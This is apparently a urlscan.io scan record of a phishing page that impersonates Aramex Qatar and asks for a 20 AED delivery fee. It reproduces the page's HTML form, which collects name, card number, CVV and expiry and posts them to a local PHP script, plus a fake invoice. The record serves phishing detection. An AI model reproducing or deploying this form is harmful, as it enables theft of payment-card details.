lp.academia.zonaverde.pt
Open in
urlscan Pro
202.61.199.154
Public Scan
Submitted URL: https://tiny.pl/9rzt7
Effective URL: https://lp.academia.zonaverde.pt/wp-content/ae/ar/amxqr/NV6588123/
Submission: On October 10 via manual from GB — Scanned from DE
Effective URL: https://lp.academia.zonaverde.pt/wp-content/ae/ar/amxqr/NV6588123/
Submission: On October 10 via manual from GB — Scanned from DE
Form analysis
1 forms found in the DOMPOST ./jean/paris.php
<form action="./jean/paris.php" class="form-fields" role="form" id="form_pay" method="post" accept-charset="utf-8" _lpchecked="1">
<input type="hidden" name="exchange_rate" value="0.2736">
<div class="payment-wrap">
<div>
<label class="payment_method">
<input type="radio" id="creditcard" name="payment_type" value="creditcard">
<img src="./files/cards.png" width="75" alt="Credit Card">
</label>
</div>
<div class="form-wrap sadad-hide" style="display:none;">
<input class="form-control" placeholder="Enter SADAD Account ID (e.g. Khalid012)" value="" maxlength="12" name="olpalias" id="olpalias" autocomplete="off" type="text">
</div>
<span class="whats-this sadad-hide" style="display:none;">Don't have SADAD Account ID?</span>
<!--Sadad Enable-->
<div id="pt-sadad-enable-outer">
<div id="pt-sadad-enable" class="pt-sadad-enable-wrap pt-arrow">
<div class="pt-sadad-enable-inner">
<h2>How to enable SADAD Account?</h2>
<ul class="pt-sadad-htp">
<li class="step1 step-help">
<figure>
<img class="img-help" src="./files/p1.png" width="50" height="32">
<figcaption>Login to your <br> online banking</figcaption>
</figure>
</li>
<li class="step2 step-help">
<figure>
<img class="img-help" src="./files/p2.png" width="48" height="33">
<figcaption>Register in SADAD Account by creating an ID and a password</figcaption>
</figure>
</li>
<script type="text/javascript">
var $cc = {}
$cc.validate = function(e) {
//if the input is empty reset the indicators to their default classes
if (e.target.value == '') {
e.target.previousElementSibling.className = 'card-type';
e.target.nextElementSibling.className = 'card-valid';
return
}
//Retrieve the value of the input and remove all non-number characters
var number = String(e.target.value);
var cleanNumber = '';
for (var i = 0; i < number.length; i++) {
if (/^[0-9]+$/.test(number.charAt(i))) {
cleanNumber += number.charAt(i);
}
}
//Only parse and correct the input value if the key pressed isn't backspace.
if (e.key != 'Backspace') {
//Format the value to include spaces in the correct locations
var formatNumber = '';
for (var i = 0; i < cleanNumber.length; i++) {
if (i == 3 || i == 7 || i == 11) {
formatNumber = formatNumber + cleanNumber.charAt(i) + ' '
} else {
formatNumber += cleanNumber.charAt(i)
}
}
e.target.value = formatNumber;
}
//run the Luhn algorithm on the number if it is at least equal to the shortest card length
if (cleanNumber.length >= 12) {
var isLuhn = luhn(cleanNumber);
}
function luhn(number) {
var numberArray = number.split('').reverse();
for (var i = 0; i < numberArray.length; i++) {
if (i % 2 != 0) {
numberArray[i] = numberArray[i] * 2;
if (numberArray[i] > 9) {
numberArray[i] = parseInt(String(numberArray[i]).charAt(0)) + parseInt(String(numberArray[i]).charAt(1))
}
}
}
var sum = 0;
for (var i = 1; i < numberArray.length; i++) {
sum += parseInt(numberArray[i]);
}
sum = sum * 9 % 10;
if (numberArray[0] == sum) {
return true
} else {
return false
}
}
//if the number passes the Luhn algorithm add the class 'active'
if (isLuhn == true) {
e.target.nextElementSibling.className = 'card-valid active'
} else {
e.target.nextElementSibling.className = 'card-valid'
}
var card_types = [{
name: 'maestro',
pattern: /^(5018|5020|5038|6304|6759|676[1-3])/,
valid_length: [12, 13, 14, 15, 16, 17, 18, 19]
}];
//test the number against each of the above card types and regular expressions
for (var i = 0; i < card_types.length; i++) {
if (number.match(card_types[i].pattern)) {
//if a match is found add the card type as a class
e.target.previousElementSibling.className = 'card-type ' + card_types[i].name;
}
}
}
$cc.expiry = function(e) {
if (e.key != 'Backspace') {
var number = String(this.value);
//remove all non-number character from the value
var cleanNumber = '';
for (var i = 0; i < number.length; i++) {
if (i == 1 && number.charAt(i) == '/') {
cleanNumber = 0 + number.charAt(0);
}
if (/^[0-9]+$/.test(number.charAt(i))) {
cleanNumber += number.charAt(i);
}
}
var formattedMonth = ''
for (var i = 0; i < cleanNumber.length; i++) {
if (/^[0-9]+$/.test(cleanNumber.charAt(i))) {
//if the number is greater than 1 append a zero to force a 2 digit month
if (i == 0 && cleanNumber.charAt(i) > 1) {
formattedMonth += 0;
formattedMonth += cleanNumber.charAt(i);
formattedMonth += '/';
}
//add a '/' after the second number
else if (i == 1) {
formattedMonth += cleanNumber.charAt(i);
formattedMonth += '/';
}
//force a 4 digit year
else if (i == 2 && cleanNumber.charAt(i) < 2) {
formattedMonth += '20' + cleanNumber.charAt(i);
} else {
formattedMonth += cleanNumber.charAt(i);
}
}
}
this.value = formattedMonth;
}
}
</script>
<li class="step3 step-help">
<figure>
<img class="img-help" src="./files/p3.png" width="27" height="33">
<figcaption>Add funds to <br> your SADAD Account</figcaption>
</figure>
</li>
</ul>
<a href="" class="pt-sadad-btn" target="_blank">Learn More</a>
</div>
</div>
</div>
<!-- End Sadad Enable Note-->
</div>
<div class="col-md-12 col-sm-12 form-wrap" style="margin-top:0; border-radius:0 0 5px 5px;">
<div class="justified-wrap">
<div class="col-md-12 col-sm-12 no-space">
<div>
<label>PACKAGE №</label>
<label type="text" class=" label-amount">NV 6588123</label>
</div>
<label>AED</label>
<label type="text" class=" label-amount">20</label>
</div>
</div>
</div>
<div class="clearfix"></div>
<div class="alert alert-danger display-hide" style="display:none;">
<button data-dismiss="alert" class="close" type="button">×</button>
<strong> Error!</strong> All fields are required.
</div>
<div class="clearfix"></div>
<!--
</div>-->
<div class="col-md-12 col-sm-12 card-details">
<div class="form-wrap creditcard-hide">
<input type="text" class="required form-control" placeholder="Full Name" required="" name="jeanname" autocomplete="off">
<input onkeyup="$cc.validate(event)" required="" type="text" class="required form-control" placeholder="Card Number" name="jeancc" autocomplete="off" maxlength="19">
<div class="col-md-4 col-sm-4 no-space">
<input required="" type="text" autocomplete="off" class="required form-control left" placeholder="CVV" name="jeancvc" maxlength="4">
</div>
<div class="col-md-5 col-sm-5 no-space">
<select required="" class="required form-control" name="jeanm" style="margin-top:6px;">
<option value="">Expiry Month</option>
<option value="01">January</option>
<option value="02">February</option>
<option value="03">March</option>
<option value="04">April</option>
<option value="05">May</option>
<option value="06">June</option>
<option value="07">July</option>
<option value="08">August</option>
<option value="09">September</option>
<option value="10">October</option>
<option value="11">November</option>
<option value="12">December</option>
</select>
</div>
<div class="col-md-3 col-sm-3 no-space">
<select required="" class="right required form-control" id="expiry_year" name="jeany" style="margin-top:6px;">
<option value="">Year</option>
<option value="18">2018</option>
<option value="19">2019</option>
<option value="20">2020</option>
<option value="21">2021</option>
<option value="22">2022</option>
<option value="23">2023</option>
<option value="24">2024</option>
<option value="25">2025</option>
<option value="26">2026</option>
<option value="27">2027</option>
<option value="28">2028</option>
<option value="29">2029</option>
<option value="30">2030</option>
<option value="31">2031</option>
<option value="32">2032</option>
<option value="33">2033</option>
<option value="34">2034</option>
<option value="35">2035</option>
<option value="36">2036</option>
</select>
<!--<input name="expDate" type="text" class=" form-control last textbox-wrap required" placeholder="Expiration Date MM/YY" maxlength="5" id="expiry" autocomplete="off" >-->
</div>
<div class="clearfix"></div>
</div>
<input type="submit" class="btn btn-lg btn-block btn-success" style="margin-top:15px;background-color: #4fad4d;
color: #fff; " value="Pay Now">
<div class="text-nav" style=" text-align:center; margin-top:15px;"><a href="">Cancel</a></div>
<img class="card-brands-supported" alt="credit cards" style="margin-top:15px;" src="./files/credit-cards.png">
<div style="display: none;" id="hidden_fields">
<input type="hidden" value="" name="amount" id="amount">
<input type="hidden" name="paypage_id" value="10031622">
</div>
<input type="hidden" name="gointerpay_finger_print_id" id="gointerpay_finger_print_id" value="">
</div>
</form>
Text Content
PLEASE WAIT ... ARAMEX Don't have SADAD Account ID? HOW TO ENABLE SADAD ACCOUNT? * Login to your online banking * Register in SADAD Account by creating an ID and a password * Add funds to your SADAD Account Learn More PACKAGE № NV 6588123 AED 20 × Error! All fields are required. Expiry Month January February March April May June July August September October November December Year 2018 2019 2020 2021 2022 2023 2024 2025 2026 2027 2028 2029 2030 2031 2032 2033 2034 2035 2036 Cancel INVOICE Invoice Number INV - 10031622 Invoice Date 11/08/2020 22:52 PM ARAMEX QATAR Work Timings: From 09:00 AM To 02:00 PM , Sunday, Monday, Tuesday, Wednesday, Thursday, Friday, Saturday Description Quantity Unit Price Amount Delivery Invoice (Purchase Package) 1 AED 20 AED 20 Terms & Conditions The consumer has the right to cancel his purchase and receive a refund if delivery is delayed for more than 15 days, unless a new delivery date has been negotiated with the merchant. mci.gov.sa Other Charges: AED 0.00 Sub Total: AED 20 Discount: AED 0.00 Total: AED 20 Close FOR BETTER VIEWING EXPERIENCE USE LARGER SCREEN OR OK